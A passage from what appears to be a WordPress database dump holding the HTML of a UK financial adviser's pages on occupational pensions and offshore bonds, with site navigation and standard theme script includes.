.post-content #checklist-1 li:before{color:#afd9a5 !important; content:\'f067\' }\r\n	.rtl .post-content #checklist-1 li:after{color:#afd9a5 !important; content:\'f067\' }\r\n	]]></style><ul id=\"checklist-1\" class=\"list-icon circle-yes list-icon-plus\"><li>We Do Jargon Free Independent Advice</li>&#13;\n<li>We Have No Hidden Fees or Costs</li>&#13;\n<li>We Always Work In Your Best Interest</li>&#13;\n<li>We Do Regular Reviews and Re-balancing</li>&#13;\n<li>We Reduce Any Administration Hassle</li>&#13;\n<li>And Most Importantly We Love What We Do</li>&#13;\n</ul><p>&#13;\n</p><p> </p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#f4f4f4 !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-2\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-thumbs-up\"/><h2>Call FREE</h2></div><div class=\"col-content-container \">on </div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-mobile-phone\"/><h2>From A Mobile</h2></div><div class=\"col-content-container \">on 0141 225 8500</div></article></section></div><div class=\"clearboth\"/>&#13;\n<p> </p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/pensions\" title=\"Back to Parent Page\">Pensions</a></li>&#13;\n						<li class=\"page_item page-item-134\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n<li class=\"page_item page-item-131\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n<li class=\"page_item page-item-137\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n<li class=\"page_item page-item-125 current_page_item\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n<li class=\"page_item page-item-90\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n<li class=\"page_item page-item-707\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n<li class=\"page_item page-item-189\"><a href=\"/pensions/personal-pensions\">Personal Pensions</a></li>&#13;\n<li class=\"page_item page-item-93\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n<li class=\"page_item page-item-103\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Investor London</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">enquiries@equalitywalk.org.uk</a></p>&#13;\n		&#13;\n				<p class=\"web\">Web: <a href=\"/\">Investor London</a></p>&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Occupational Pensions','Occupational pension schemes are set up by employers to provide pensions (and sometimes life assurance) for employees. Find out about the 2 main types here.','publish','closed','closed','','occupational-pensions','','','2017-09-21 16:34:35','2017-09-21 16:34:35','',0,'http://www.equalitywalk.org.uk/occupational-pensions',0,'page','',0),(86,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<body class=\"page page-id-100 page-child parent-pageid-28 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-100 current_page_item menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Offshore Bonds										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/investments\" title=\"Investments\">Investments</a></li><li>Offshore Bonds</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-100\" class=\"post-100 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Offshore Bonds</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h4 style=\"text-align: center;\"><span style=\"color: #99cc00;\">Offshore Bonds <span style=\"color: #000000;\">can provide you with a WIDER CHOICE of investment opportunities, higher growth and </span><span style=\"color: #000000;\"><span style=\"text-decoration: underline;\">legally</span> minimise your tax liabilities </span></span></h4>&#13;\n<p style=\"text-align: center;\"/>&#13;\n<h6 style=\"text-align: center;\"><em>We’ll help dispel the myth that offshore bonds are only suitable for wealthy clients, and how recent reforms are opening up this flexible investment opportunity to a whole new market.</em></h6>&#13;\n<p style=\"text-align: justify;\">There are many advantages for the  investor  looking to diversify their investment portfolio offshore,  normally implemented with an offshore bond. This is a wrapper through which you can hold several investment funds such as unit trusts &amp; open up ended investment companies, OEICs .</p>&#13;\n<p style=\"text-align: justify;\">Our Offshore Investment Planning Service will help balance YOUR Investment risk with the potential for greater returns, whilst ensuring you benefit from mitigating all allowable taxation.</p>&#13;\n<p>Here are some of the clients who could benefit for our service</p>&#13;\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td valign=\"top\" width=\"263\"><span style=\"color: #99cc00;\">          Who Could Benefit </span></td>&#13;\n<td valign=\"top\" width=\"264\"><span style=\"color: #99cc00;\">          The Potential Benefits</span></td>&#13;\n</tr><tr><td valign=\"top\" width=\"263\">&#13;\n<ul><li>You are a parent/grandparent planning for child university fees.</li>&#13;\n<li>Your an Expat and are expecting to move or work abroad in the future.</li>&#13;\n<li>You are a high earning UK tax payer earning more than 100k per year.</li>&#13;\n<li>Your A Trustee of a Discretionary Trust</li>&#13;\n<li>You have a large sum to invest – over £1,000,000</li>&#13;\n</ul></td>&#13;\n<td valign=\"top\" width=\"264\">&#13;\n<ul><li>Reduce tax liabilty when cashing in, flexible access – improve returns.</li>&#13;\n<li>Portable investments with flexible access, minimise tax, improve returns.</li>&#13;\n<li>Flexibilty on who inherits and how much whilst reducing your IHT.</li>&#13;\n<li>Portable investments with flexible access, minimise tax, improve returns.</li>&#13;\n<li>Reduce the tax you pay, control risk &amp; increase investment returns</li>&#13;\n</ul></td>&#13;\n</tr></tbody></table><h6 style=\"text-align: center;\">We have the discipline to translate your investment plan into manageable pieces and then make sure that all of the pieces are implemented and come to life.</h6>&#13;\n<p style=\"text-align: justify;\">Offshore bonds will be of benefit if you have currently used up any additional tax-efficient vehicles, such as a pension allocation or (ISA) individual savings account. They will be really useful for anyone who may move or retire overseas.</p>&#13;\n<p style=\"text-align: justify;\"/>&#13;\n<p style=\"text-align: justify;\">  Tax Efficiency</p>&#13;\n<p style=\"text-align: justify;\">  Diversification</p>&#13;\n<p style=\"text-align: justify;\">  Risk Management</p>&#13;\n<p style=\"text-align: justify;\">  Confidentiality </p>&#13;\n<p style=\"text-align: justify;\">Help is at hand<br/>&#13;\nWe will assist you in minimising the tax you need to pay if you cash in your bond.  For instance, you may be a higher-rate taxpayer today but when retired may be paying a reduced rate of tax when you cash in.  On the other hand, you might assign the actual bond to someone on a lower tax bracket to lessen the taxes liability.</p>&#13;\n<h5 style=\"text-align: justify;\">Why Choose Equity SMART</h5>&#13;\n<p style=\"text-align: justify;\">As one of U.K.’s most respected financial planning firms we are fully invested in our clients, meaning we will not look at your investments as simply another policy or plan. Our insights and advice that will be clear, relevant, actionable and achievable, showing you in practicable steps how you can get there from here.</p>&#13;\n<p>Call us today at  for your free consultation or click the box below to have a Equity SMART investment advisor call you at a time that suits.</p>&#13;\n<p>All calls are handled discretely and we value your privacy.</p>&#13;\n<p>Worry Less, Accomplish More.<br/><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style></p><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:f8f8f8 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>FREE 20 Minute Adviser Consultation</h2><p>Click the button to book yours now...</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/investments\" title=\"Back to Parent Page\">Investments</a></li>&#13;\n						<li class=\"page_item page-item-119\"><a href=\"isas\">ISAs</a></li>&#13;\n<li class=\"page_item page-item-116\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n<li class=\"page_item page-item-100 current_page_item\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n<li class=\"page_item page-item-122\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Offshore Bonds &amp; Investment Opportunities','Offshore bonds are not just for the wealthy. They can be attractive investments. Find out more.','publish','closed','closed','','offshore-bonds-investment-opportunities','','','2017-09-21 16:34:35','2017-09-21 16:34:35','',0,'http://www.equalitywalk.org.uk/offshore-bonds-investment-opportunities',0,'page','',0),(87,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<body class=\"blog light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" 